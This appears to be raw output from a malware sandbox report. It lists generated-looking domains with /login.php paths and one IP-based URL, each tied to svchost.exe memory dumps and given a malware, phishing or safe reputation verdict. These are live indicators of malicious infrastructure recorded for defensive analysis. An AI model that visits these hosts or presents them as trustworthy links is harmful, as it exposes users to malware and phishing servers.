http://qetyvil.com/login.php	svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326892101.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://qetynev.com/login.php	svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2592000281.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610522908.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2759913760.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573770543.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323657176.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738516422.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2578065233.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635676013.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321666596.00000000033D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pujylog.com/login.php	svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321434222.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573770543.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332778027.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2333419776.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2578065233.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321666596.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://gadyniw.com/login.php	svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3302424542.0000000000893000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3283281392.0000000008784000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2396823285.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2155150601.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2394995795.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2152199201.000000000338F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2434123780.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3303400991.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000006.00000002.2670340730.0000000009290000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000006.00000002.2554600445.000000000165E000.00000004.00000020.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000016.00000002.2606731229.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000016.00000002.2606731229.0000000000658000.00000004.00000020.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000016.00000002.2767328417.0000000008790000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000016.00000002.2754881152.000000000843D000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 0000001F.00000002.2711620441.0000000008C6C000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 0000001F.00000002.2695589851.0000000000CAA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://puzytap.com/login.php	svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330154891.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577742596.0000000008692000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323585198.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577938444.0000000008693000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://lysynaj.com/login.php	svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330154891.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334859023.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326892101.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2580751870.00000000087AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://gaqyres.com/login.php	svchost.exe, 00000002.00000003.2796055638.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3246274264.000000000870B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2805126129.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2799115351.0000000008691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2793841550.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2801740808.00000000086F9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://lyxygur.com/login.php	svchost.exe, 00000002.00000003.2796055638.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2805126129.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2799115351.0000000008691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2384269083.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2793841550.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2802098474.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3266427470.00000000087A4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://vopygat.com/login.php	svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577742596.0000000008692000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577938444.0000000008693000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321666596.00000000033D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://puzybil.com/login.php	svchost.exe, 00000002.00000003.2671509523.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671356551.000000000868F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671936852.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349262173.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://lyvynid.com/login.php	svchost.exe, 00000002.00000003.2671509523.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671936852.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738516422.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671484952.00000000086F2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://qeqyxyp.com/login.php	svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326892101.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2580751870.00000000087AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2581725706.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://106.15.232.163:8000/dh/147287063_134827.html#index8?d=lyrysor.com	svchost.exe, 00000002.00000003.2434703123.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2471230850.0000000005801000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2433894969.00000000087AA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://qegyfyp.com/login.php	svchost.exe, 00000002.00000003.2194039895.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2198550241.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557475743.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403579535.000000000870D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202773518.0000000008693000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393093066.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577719348.0000000008784000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202728385.0000000008644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2272090324.0000000008693000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404003407.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548810720.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2434123780.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202332641.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2198486951.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2578793071.0000000008786000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2194197284.0000000008691000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://qeqykog.com/login.php	svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2308037835.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296517767.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2302432052.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296191981.0000000000883000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2305095010.0000000008701000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2295479426.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296451736.0000000008702000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://lysyxar.com/login.php	svchost.exe, 00000002.00000003.2347368990.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338991462.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339128784.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2628718282.00000000087AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671936852.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2640219450.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339275288.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347595407.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635696281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635676013.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338959183.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635826907.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638579923.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://lyxygax.com/login.php	svchost.exe, 00000002.00000003.2671356551.000000000868F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338991462.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339128784.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2640219450.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339275288.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635676013.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338959183.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2639583106.0000000008690000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635826907.00000000086F2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://lygyjuj.com/login.php	svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321460609.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2592000281.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321367524.0000000008691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610522908.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2759913760.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573770543.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323657176.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2768400966.0000000008705000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738516422.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2320047859.00000000033EF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://pumytup.com/login.php	svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3284179552.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3402132488.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3344516796.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3268596550.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3246499612.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202773518.0000000008693000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393093066.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202728385.0000000008644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3388123270.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393409003.000000000338E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3402591277.0000000008693000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202332641.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3347345159.000000000338D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2194197284.0000000008691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3302596386.000000000865D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://qedyrag.com/login.php	svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553968961.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557483842.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2298951843.00000000086D4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2556984027.00000000086F6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://qedykiv.com/login.php	svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558367053.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2307644873.0000000003353000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://puzylol.com/login.php	svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334498126.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334047161.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337179930.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328870829.000000000868F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334800958.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2580751870.00000000087AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2581725706.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://puvydov.com/login.php	svchost.exe, 00000002.00000003.2318282054.00000000008FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553968961.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303458870.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557483842.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303458885.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321434222.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2307697997.0000000003394000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323657176.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2305813558.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2307211585.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2556984027.00000000086F6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://gahyqub.com/login.php	svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2580751870.00000000087AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://pupywog.com/login.php	svchost.exe, 00000002.00000003.2318282054.00000000008FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303458870.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2298951843.00000000086D4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2305813558.00000000008F9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
